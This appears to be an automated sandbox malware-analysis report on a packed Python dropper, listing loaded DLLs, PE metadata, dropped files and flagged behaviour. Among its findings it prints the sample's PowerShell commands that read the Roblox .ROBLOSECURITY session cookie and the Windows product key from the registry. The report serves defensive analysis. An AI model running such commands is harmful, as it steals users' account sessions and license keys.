Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\tasklist.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static file information: File size 7266369 > 1048576
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdbhP source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1770892655.00007FF8E7290000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6D1F000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: 6C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.pdb source: powershell.exe, 0000002D.00000002.1546305256.0000014D0A895000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000000.00000003.1323859878.00000162E1226000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1777638833.00007FF8F9D71000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1769130422.00007FF8E6DA1000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000048.00000000.1631513880.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1774041313.00007FF8E795B000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1771559023.00007FF8E7316000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776891927.00007FF8F6DA1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773840617.00007FF8E75B1000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775280182.00007FF8F0941000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776711949.00007FF8F5851000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773557891.00007FF8E755C000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1776445085.00007FF8F1DF1000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1775912815.00007FF8F0D01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1773292284.00007FF8E7511000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772235361.00007FF8E7361000.00000040.00000001.01000000.0000000E.sdmp
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
PE file contains an invalid checksum
Source: libcrypto-1_1.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x124d75
Source: _ctypes.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x19e1b
Source: unicodedata.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x4a227
Source: _bz2.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1784a
Source: libffi-8.dll.0.dr Static PE information: real checksum: 0x0 should be: 0xa1d1
Source: _ssl.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x17418
Source: sqlite3.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x9ff17
Source: libssl-1_1.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x349c6
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: real checksum: 0x6f5100 should be: 0x6f6e8e
Source: _queue.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xc985
Source: _socket.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x15415
Source: python311.dll.0.dr Static PE information: real checksum: 0x0 should be: 0x1a7f3d
Source: _decimal.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1f8c8
Source: _hashlib.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0xa12c
Source: select.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x12345
Source: _lzma.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x23dc5
Source: _sqlite3.pyd.0.dr Static PE information: real checksum: 0x0 should be: 0x1deb7
Source: c3m2uwl3.dll.49.dr Static PE information: real checksum: 0x0 should be: 0xa11f
PE file contains sections with non-standard names
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Static PE information: section name: _RDATA
Source: libffi-8.dll.0.dr Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.0.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E754D418 push rsi; retf 2_2_00007FF8E754D419
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Code function: 2_2_00007FF8E754D390 push rsi; iretd 2_2_00007FF8E754D3A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF88697D2A5 pushad ; iretd 9_2_00007FF88697D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF886A98AAB push eax; iretd 9_2_00007FF886A98ABA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF886A99DF8 push E95C6F79h; ret 9_2_00007FF886A99E79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF886AB19D3 pushad ; ret 45_2_00007FF886AB19D9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 45_2_00007FF886AB4203 push ebp; iretd 45_2_00007FF886AB4232
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_ssl.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_socket.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libffi-8.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_lzma.pyd Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\libssl-1_1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_queue.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\select.pyd Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\python311.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\sqlite3.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76002\_bz2.pyd Jump to dropped file
